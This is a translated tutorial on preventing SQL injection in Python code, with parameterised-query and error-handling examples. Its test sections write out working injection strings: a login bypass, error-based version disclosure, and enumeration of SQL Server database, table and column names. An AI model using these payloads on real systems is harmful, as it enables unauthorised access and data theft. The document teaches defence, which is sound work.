
Python injection in practice: preventing SQL injection when connecting to MySQL

Does Python need SQL injection protection when connecting to MySQL?

Yes. Any code that builds SQL dynamically has to guard against SQL injection; this applies not only to PHP but to Python too, and to most languages.

If the special characters in variables are not handled when SQL statements are constructed dynamically, the result can be serious security problems: exploitable program flaws, data theft and data destruction. There are many articles online explaining SQL injection; interested readers can search for them and study the topic in depth.

Briefly, the driver's execute() method is documented as follows:

execute(self, query, args=None)

Execute a query.

query -- string, query to execute on server
args -- optional sequence or mapping, parameters to use with query.

Note: If args is a sequence, then %s must be used as the parameter placeholder in the query. If a mapping is used, %(key)s must be used as the placeholder.

Returns long integer rows affected, if any

Placeholders are supposed to be used for *values*, not other parts of the SQL statement. To insert table names, column names and stuff like that, use Python-level formatting.

The mechanism is there, but is it actually effective in our code? Let us test it.

Python SQL injection prevention test

1. Bypassing authentication to log in directly

Consider the login form shown in the original post's screenshot.

Besides the username and password fields there is also a company-name field, and from the shape of the form it is easy to infer that the SQL looks like this:

SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

I found that the first two fields were checked, but the third had been overlooked; that is where the vulnerability lies. The injection starts by entering ' or 1=1-- into the company-name field (the original post shows this in a screenshot).

Fill in an arbitrary username, leave the password blank, and after clicking the login button the login actually succeeds.

Looking at the final SQL reveals the reason:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'

The single quote in the first half of the condition is closed by the injected quote, the one in the second half is commented out by "--", and in between an always-true condition, "1=1", has been inserted; as a result any input logs in successfully. And the damage SQL injection can do goes far beyond anonymous login.
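The following is an added example, not code from the original post. It places the execute() placeholder rule quoted above next to the login bypass just shown: one function splices the Corp value into the SQL text the way the vulnerable form does, the other passes the same values as bind parameters, and a third shows the Python-level allowlist that is needed when a table name, which placeholders cannot carry, has to vary. It uses Python's standard sqlite3 module as a stand-in for a MySQL connection so that it runs offline (SQLite's placeholder is ? where MySQLdb's is %s; the execute(sql, args) call is otherwise the same); the users table and the table-name allowlist are constructed for the example. The article's own demonstrations target SQL Server, but the mechanism and the fix are identical for MySQL.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database stands in for MySQL.
# The page's form has three fields: Name, Password and Corp.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, corp TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'alice-pw', 'acme')")
    conn.commit()
    return conn

def vulnerable_login(conn, name, password, corp):
    """Builds the statement by string formatting, as the vulnerable form does:
    the Corp value becomes part of the SQL text, so a quote inside it ends
    the literal and whatever follows is parsed as SQL."""
    sql = ("SELECT * FROM users WHERE name='%s' AND password='%s' AND corp='%s'"
           % (name, password, corp))
    return conn.execute(sql).fetchone() is not None

def safe_login(conn, name, password, corp):
    """Passes the values as bind parameters: the driver sends them as data,
    never as SQL text, so ' or 1=1-- is just a company name that matches
    nothing. SQLite's placeholder is ?; with MySQLdb the query string uses
    %s and the args tuple is identical, as the execute() docstring says."""
    sql = "SELECT * FROM users WHERE name=? AND password=? AND corp=?"
    return conn.execute(sql, (name, password, corp)).fetchone() is not None

# Assumed allowlist: the table names this application is allowed to query.
ALLOWED_TABLES = {"users"}

def safe_count_by_corp(conn, table, corp):
    """Placeholders cannot carry identifiers (table or column names), so the
    identifier is checked against a fixed allowlist and only then formatted
    into the SQL text at Python level; the value still travels as a parameter."""
    if table not in ALLOWED_TABLES:
        raise ValueError("table name not in allowlist: %r" % table)
    sql = "SELECT COUNT(*) FROM %s WHERE corp=?" % table
    return conn.execute(sql, (corp,)).fetchone()[0]

if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1--"  # the page's bypass string, typed into the Corp field
    print("vulnerable:", vulnerable_login(conn, "SQL inject", "", payload))  # True
    print("safe:      ", safe_login(conn, "SQL inject", "", payload))        # False
    print("legit:     ", safe_login(conn, "alice", "alice-pw", "acme"))      # True
    print("count:     ", safe_count_by_corp(conn, "users", "acme"))          # 1
```

Running the block prints True for the string-formatted query, because the statement it executes is the same `... corp='' or 1=1--'` shown above, and False for the parameterised one with the very same input; the allowlist raises ValueError for any table name it does not know, so a caller can never turn the formatted identifier into injected SQL.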

2. Using exceptions to extract information

Now enter "' or 1=(SELECT @@version) --" in the third field (shown in a screenshot in the original post).

The back-end SQL becomes:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)--'

The condition has become 1=(SELECT @@VERSION), which is bound to raise an error, and the error is exactly what we want. After clicking Login the page shows:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.

Something frightening has happened: the server's operating system and SQL Server version are revealed through the error message.

Obtaining all database, table and column names on the server

Next, enter the following: "t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--". At this point the third field turns out to have a length limit, but a purely client-side limit is no protection at all; it can be removed directly in the Chrome browser (the original post shows this in a screenshot).

Click Login and the response is:

Conversion failed when converting the nvarchar value 'master' to data type int.

The database name "master" is exposed through the exception! Changing the number in the SQL statement in turn yields the name of every database on the server.

Next, enter: "b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--"

The response is:

Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.

We now have the first table name in the master database, "spt_fallback_db"; as before, changing the number in turn yields every table name in the database.

Now, taking the "spt_fallback_db" table as an example, try to obtain all of its column names. Enter the following:

"b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db');"

The error returned is:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int."

So the first column name, "xserver_name", appears; changing the number in turn enumerates every column name.

Final goal: obtaining the data in the database

At this point we know that SQL injection can obtain every database, table and column; the code for retrieving the data itself will not be described, and the purpose of this article has been achieved. What does SQL injection mean? It means that every piece of data in the database can be stolen.

Knowing this, can anyone still ignore SQL injection vulnerabilities?

So, on the subject of security, some advice for developers:

(1) Always be wary of user-supplied content: input boxes, search boxes, URLs and so on.

(2) Validation that exists only on the client is the same as no validation.

(3) Never expose server error messages to users; this is not only about 404 pages, errors can reach the user by other routes as well.
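As an added example (not part of the original article), here is how points (2) and (3) look in code. The field length is checked again on the server, because the maxlength on the form can be removed in the browser; and a database error is logged in full on the server side, while the user only ever sees a fixed message with a reference id, so the version string, database names and column names that leaked through the error text above never reach the page. sqlite3 again stands in for MySQL, the users table and the 64-character limit are assumptions, and the ListHandler exists only so the example can show what stays in the log.

```python
import logging
import sqlite3
import uuid

log = logging.getLogger("login")

class ListHandler(logging.Handler):
    """Collects formatted log records in memory so the example can show what
    stays server-side; a real deployment writes to a file or log service."""
    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(self.format(record))

handler = ListHandler()
log.addHandler(handler)
log.setLevel(logging.ERROR)

GENERIC_MESSAGE = "Login failed."
MAX_FIELD_LEN = 64  # assumed limit; enforced here, not only in the browser

def open_db(with_table):
    """Constructed in-memory database; with_table=False leaves the users table
    missing so that a genuine database error can be provoked for the demo."""
    conn = sqlite3.connect(":memory:")
    if with_table:
        conn.execute("CREATE TABLE users (name TEXT, password TEXT, corp TEXT)")
        conn.execute("INSERT INTO users VALUES ('alice', 'alice-pw', 'acme')")
    return conn

def field_ok(value):
    """Server-side length check, applied regardless of any client-side limit."""
    return isinstance(value, str) and 0 < len(value) <= MAX_FIELD_LEN

def run_query(conn, sql, params):
    """Runs a parameterised statement and returns (rows, user_message).
    On a database error the full detail is logged under a short reference id
    and the caller receives only a generic text; the exception's wording,
    which may contain server internals, is never returned."""
    try:
        return conn.execute(sql, params).fetchall(), None
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("ref=%s sql=%r params=%r error=%s", ref, sql, params, exc)
        return None, "%s (reference %s)" % (GENERIC_MESSAGE, ref)

def login(conn, name, password, corp):
    """Returns a dict the web layer can render. Every failure path uses the
    same wording, so a database error cannot be told apart from a wrong
    password by reading the page."""
    if not (field_ok(name) and field_ok(corp) and isinstance(password, str)):
        return {"ok": False, "message": GENERIC_MESSAGE}
    rows, err = run_query(
        conn,
        "SELECT name FROM users WHERE name=? AND password=? AND corp=?",
        (name, password, corp),
    )
    if err is not None:
        return {"ok": False, "message": err}
    return {"ok": bool(rows), "message": "" if rows else GENERIC_MESSAGE}

if __name__ == "__main__":
    broken = open_db(with_table=False)
    print(login(broken, "alice", "alice-pw", "acme"))   # generic message + reference
    print(handler.records[-1])                           # full detail, server side only
    good = open_db(with_table=True)
    print(login(good, "alice", "alice-pw", "acme"))     # {'ok': True, 'message': ''}
    print(login(good, "a" * 100, "alice-pw", "acme"))   # rejected by the server-side limit
```

The reference id is the one thing the user can quote to support; everything else about the failure lives only in the server log, which is where the "Conversion failed ..." text from the article belongs.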

Article source: 智云一二三科技

Article title: Python injection in practice: preventing SQL injection when connecting to MySQL

Article URL: https://www.zhihuclub.com/79376.shtml

About the author: 智云科技
